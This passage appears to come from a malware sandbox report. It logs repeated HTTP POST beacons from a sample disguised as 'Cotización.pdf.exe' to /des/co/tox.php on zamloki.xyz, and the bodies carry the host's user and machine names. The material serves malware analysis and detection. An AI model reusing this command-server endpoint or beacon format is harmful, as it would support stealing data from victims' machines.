                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JRHf%2F72c6f4kmZcDOpxn4J9lymdqDT7kgJ%2BAjQv1DMYe5Jt9iXko9FjTHvTanAW8VV6nNVfEAb45XBeRVV4iZvv%2FiXynhUj3%2FpVzb2jqkLSIOGMPpyURCHrcZCqpBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f309fb618e5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    49192.168.2.349786172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:16.967062950 CEST5553OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:16.985224009 CEST5554OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:17.311373949 CEST5554INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JmNTZQkcUw8%2F%2BJccyYVD5%2FTJEJZdNE7UKX6mWzcgJsWhwPOhdJWWmr7SpmdP3Oe%2FO2H%2BeVJTgcwzxVhrcYVpf0M%2Fe6NNDEnwfmwa8RYLuYphU4yDddYdK6J2ryyoCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f341b6d4a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.349732104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:50.685571909 CEST1284OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:50.705589056 CEST1284OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:50.964174032 CEST1285INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6QiUXwGm%2BSB7phd9TIMgyywpFBOQ1150bkCqeJT7VRV7L0ypEV9mtiJwg2PGdebNqSi4jGGrU6CAMhx8qoZ%2FFYyj6j%2BVct5zobbDfptUHUV5oCl0hBpvnAj2MNCVDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8fd81e05b3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    50192.168.2.349787104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:17.585324049 CEST5555OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:17.606148958 CEST5556OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:17.856173992 CEST5556INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WH48qlpx84pqvmLb1NocFSf8j1w03u%2B0i%2B1DxXMO6KndDehoFRrp%2BjTGVtxNNVL7ZJT5C4nZ9gRo6KV5xHOgX2EDjhCBnCLACCgJo0v6C%2Bj%2FAu75E4%2Bxh9JzmIx6JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f37fe0b16ea-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    51192.168.2.349788172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:18.113141060 CEST5557OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:18.149224043 CEST5557OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:18.402647018 CEST5558INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3hPrdG89ji6inTdiM09NUU%2BZNFWI96kVruwp9r7QDUQeFdlj7Y7N4vwax559bdBdOt6fF8j0BgRoJZwFtbfZPFLiHOcdKdbhsib0lM654Jh7tR9TnGH74fcTCOrKmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f3b4d4a4ddc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    52192.168.2.349789172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:18.699980021 CEST5559OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:18.720247984 CEST5559OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:18.968704939 CEST5560INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9kZWps58Fi225qP0LV3rm1i%2FN8y1h03gRZmXAecO0lQr4Z5AwwUyZNSZh8xp7legzoeVuruAMJugwR80%2FliXyL%2BnqSNEzWXahxllgkAa3IGQqzSvOr4lczcg4%2FWk0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f3efa944e79-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    53192.168.2.349790104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:19.212323904 CEST5561OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:19.230227947 CEST5561OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:19.470421076 CEST5562INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xwYuDtH9HSQxBwSyFpvJqqlSoWzUlMc4QGwbj2psWbqdbXdSRHZXhg8E3mYCUY%2F7VIhPtvAHszUo0DkwuhYrOThYiXuw8LIbDlkOpUhI7zI7rD6j6cLPQR00NgNgtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f4229e04e0d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    54192.168.2.349791104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:19.722256899 CEST5563OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:19.744975090 CEST5563OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:20.622111082 CEST5564INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B77JN6OzxShMVQhsJjC6W75slw7YWZLL4bKIBNZs0%2FI55DRYup42ufFFa05rNg4BuUPzmTBPWWC0y0yhziSMwL7We2mBoCDodZYFBjDmxh0Ggu5tLNS46Kkcm2Aydw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f455851dfef-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    55192.168.2.349792172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:20.870407104 CEST5565OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:20.889235020 CEST5565OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:21.413121939 CEST5566INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f2oflzZXhzuy%2FPvGnRg6nTrIF5sCkIB66kDycIhwFgmMwOqnyKhY%2BhTWW65%2BYvz3BkY6JWuf9h5q9qdQdhnqIUrjrSsqMSGWjqKSxNBarHVx601WQvLj51jOF6FXCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f4c8dafe007-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    56192.168.2.349793104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:21.693624973 CEST5567OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:21.713644981 CEST5567OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:21.994177103 CEST5568INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZWw1SDhu8rvBppNoNp%2FivpzmwECA5BIYnCnRfujHmL6b9dl%2BnY3sLAeMI8ny9h0wEy27GW53s2ekdr%2BwofNYUmT7Y27izqTkKDB5UF71fT1T6JqIeA66o454%2B6hr5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f51a8a71f15-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    57192.168.2.349794104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:22.326073885 CEST5568OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:22.343779087 CEST5569OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:22.615356922 CEST5569INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G9R6P%2FUfscJM2drHYhSUZyZ%2BQl8UpsZoxa7jmicZduTDk18CZAo45v8whnQDEMD14gft9ID45GirIZatdOgNq5wIIQjrdyDFxg0246FOQoVSa1B3in%2BKxK9H3%2FXcJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f559fe02be9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    58192.168.2.349795172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:22.876754045 CEST5570OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:22.896707058 CEST5571OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:23.157938957 CEST5571INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mqWUv%2FgqHKsORbchK4GvquBftjuNzgcLPH12FxyWZH8FRtzrsKxmM4Rv4lvGWNG3vpv7Wh2VeS7E1HyFUx2yemh97B2vpOtOXkLlBK6g%2FsixeOS495F1%2FYj3YH0hqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f591bedd6ed-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    59192.168.2.349796172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:23.408567905 CEST5572OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:23.430516005 CEST5572OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:23.669811010 CEST5573INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91z%2BD3vR6y0IrXr4Pn5q3i%2F2a4RqYbSNjre%2By3BO6FoUG1gu3dz0r4eHcAXYVJ5cJmR7HS%2FGX20BJDoT0505AfjlH%2BCnG0cgbHDE%2FqAzlBDWHH3BieZgFxpYymdCCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f5c58521f1d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.349733104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:51.305397034 CEST1287OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:51.323781013 CEST1287OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:51.579050064 CEST1289INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Apn%2B0OCyMoyrF1QgosNV63WSd7UTZUrhhcOSj1x7eJdRh63XjOw41%2FPjXyIswzef7HQ%2By3U505zg7mxsZmPRPvOLraD02fnVUZg9W2lRtvvTZ5SykdWn07Sp0RkLoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e93b9494e3e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Jul 21, 2021 17:01:51.579077005 CEST1289INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    60192.168.2.349797104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:23.925389051 CEST5574OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
